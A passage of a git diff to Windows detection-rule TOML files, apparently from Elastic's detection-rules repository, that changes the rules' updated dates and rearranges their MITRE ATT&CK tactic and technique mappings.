+[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.013" +name = "PowerShell Profile" +reference = "https://attack.mitre.org/techniques/T1546/013/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml index 630f7decf65..9cb6a3c5279 100644 --- a/rules/windows/persistence_priv_escalation_via_accessibility_features.toml +++ b/rules/windows/persistence_priv_escalation_via_accessibility_features.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -154,36 +154,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.008" name = "Accessibility Features" reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1036" -name = "Masquerading" -reference = "https://attack.mitre.org/techniques/T1036/" - +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [[rule.threat.technique.subtechnique]] -id = "T1036.003" -name = "Rename Legitimate Utilities" -reference = "https://attack.mitre.org/techniques/T1036/003/" +id = "T1546.008" +name = "Accessibility Features" +reference = "https://attack.mitre.org/techniques/T1546/008/" + + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 30186fd049e..7fa5626eea9 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -154,23 +154,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.015" +name = "Component Object Model Hijacking" +reference = "https://attack.mitre.org/techniques/T1546/015/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index 9a17c463d7f..ed301eb30bb 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/11" [rule] author = ["Elastic"] @@ -122,81 +122,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1127" -name = "Trusted Developer Utilities Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1127/" - -[[rule.threat.technique.subtechnique]] -id = "T1127.001" -name = "MSBuild" -reference = "https://attack.mitre.org/techniques/T1127/001/" - -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.002" -name = "Control Panel" -reference = "https://attack.mitre.org/techniques/T1218/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.004" -name = "InstallUtil" -reference = "https://attack.mitre.org/techniques/T1218/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.005" -name = "Mshta" -reference = "https://attack.mitre.org/techniques/T1218/005/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.007" -name = "Msiexec" -reference = "https://attack.mitre.org/techniques/T1218/007/" - -[[rule.threat.technique.subtechnique]] -id = "T1218.009" -name = "Regsvcs/Regasm" -reference = "https://attack.mitre.org/techniques/T1218/009/" - +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" [[rule.threat.technique.subtechnique]] -id = "T1218.010" -name = "Regsvr32" -reference = "https://attack.mitre.org/techniques/T1218/010/" +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" -[[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" -[[rule.threat.technique]] -id = "T1220" -name = "XSL Script Processing" -reference = "https://attack.mitre.org/techniques/T1220/" [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index 9ec575d97b2..fbc8a28fda9 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/11/14" [rule] author = ["Elastic"] @@ -74,18 +74,36 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index d4d2d46de13..7b99257a7d9 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/26" [transform] [[transform.osquery]] @@ -137,23 +137,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.003" +name = "Time Providers" +reference = "https://attack.mitre.org/techniques/T1547/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 78c51316c02..1fb717e1aa7 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -101,18 +101,36 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.011" +name = "Application Shimming" +reference = "https://attack.mitre.org/techniques/T1546/011/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index cd8b93affc2..5ce887dd079 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -96,23 +96,46 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + + +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/privilege_escalation_lsa_auth_package.toml b/rules/windows/privilege_escalation_lsa_auth_package.toml index c66cc222bb1..24dcc87b0fe 100644 --- a/rules/windows/privilege_escalation_lsa_auth_package.toml +++ b/rules/windows/privilege_escalation_lsa_auth_package.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -79,18 +79,36 @@ The Local Security Authority (LSA) in Windows manages authentication and securit [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.002" name = "Authentication Package" reference = "https://attack.mitre.org/techniques/T1547/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.002" +name = "Authentication Package" +reference = "https://attack.mitre.org/techniques/T1547/002/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_persistence_phantom_dll.toml b/rules/windows/privilege_escalation_persistence_phantom_dll.toml index ac568a9852b..4cc497eaafe 100644 --- a/rules/windows/privilege_escalation_persistence_phantom_dll.toml +++ b/rules/windows/privilege_escalation_persistence_phantom_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/02" [rule] author = ["Elastic"] @@ -151,36 +151,53 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.001" +name = "DLL" +reference = "https://attack.mitre.org/techniques/T1574/001/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml index b81fb1bf61d..e4d788cb975 100644 --- a/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml +++ b/rules/windows/privilege_escalation_port_monitor_print_processor_abuse.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/02/25" [rule] author = ["Elastic"] @@ -83,12 +83,10 @@ Port monitors and print processors are integral to Windows printing, managing da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.010" name = "Port Monitors" @@ -99,7 +97,31 @@ id = "T1547.012" name = "Print Processors" reference = "https://attack.mitre.org/techniques/T1547/012/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.010" +name = "Port Monitors" +reference = "https://attack.mitre.org/techniques/T1547/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1547.012" +name = "Print Processors" +reference = "https://attack.mitre.org/techniques/T1547/012/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml index 5dd2e273789..4f92ccdc7c3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_clipup.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -88,36 +88,53 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml index 0a42a979410..cc5a3e44aa3 100644 --- a/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml +++ b/rules/windows/privilege_escalation_uac_bypass_com_interface_icmluautil.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "m365_defender"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -85,36 +85,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1559" name = "Inter-Process Communication" reference = "https://attack.mitre.org/techniques/T1559/" - [[rule.threat.technique.subtechnique]] id = "T1559.001" name = "Component Object Model" reference = "https://attack.mitre.org/techniques/T1559/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml index 47b9cbe8d77..8763bfd5251 100644 --- a/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml +++ b/rules/windows/privilege_escalation_uac_bypass_diskcleanup_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/08/28" [rule] author = ["Elastic"] @@ -101,41 +101,53 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml index 0589211912e..db0e8042ad4 100644 --- a/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml +++ b/rules/windows/privilege_escalation_uac_bypass_dll_sideloading.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/27" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -92,28 +92,46 @@ file where host.os.type == "windows" and event.type : "change" and process.name [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" + + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml index 3834bf21c19..c9cd1c4a1bb 100644 --- a/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml +++ b/rules/windows/privilege_escalation_uac_bypass_event_viewer.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/09/11" [transform] [[transform.osquery]] @@ -144,18 +144,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [[rule.threat.technique.subtechnique]] id = "T1548.002" name = "Bypass User Account Control" reference = "https://attack.mitre.org/techniques/T1548/002/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.002" +name = "Bypass User Account Control" +reference = "https://attack.mitre.org/techniques/T1548/002/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml index 41942914eca..5205c3c67f0 100644 --- a/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml +++ b/rules/windows/privilege_escalation_unusual_svchost_childproc_childless.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/13" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -110,36 +110,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [[rule.threat.technique.subtechnique]] id = "T1055.012" name = "Process Hollowing" reference = "https://attack.mitre.org/techniques/T1055/012/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" [[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" +id = "T1055.012" +name = "Process Hollowing" +reference = "https://attack.mitre.org/techniques/T1055/012/" + + [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index d4e57b19af3..3952b06069b 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,44 +57,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" +id = "T1197" +name = "BITS Jobs" +reference = "https://attack.mitre.org/techniques/T1197/" -[[rule.threat.technique.subtechnique]] -id = 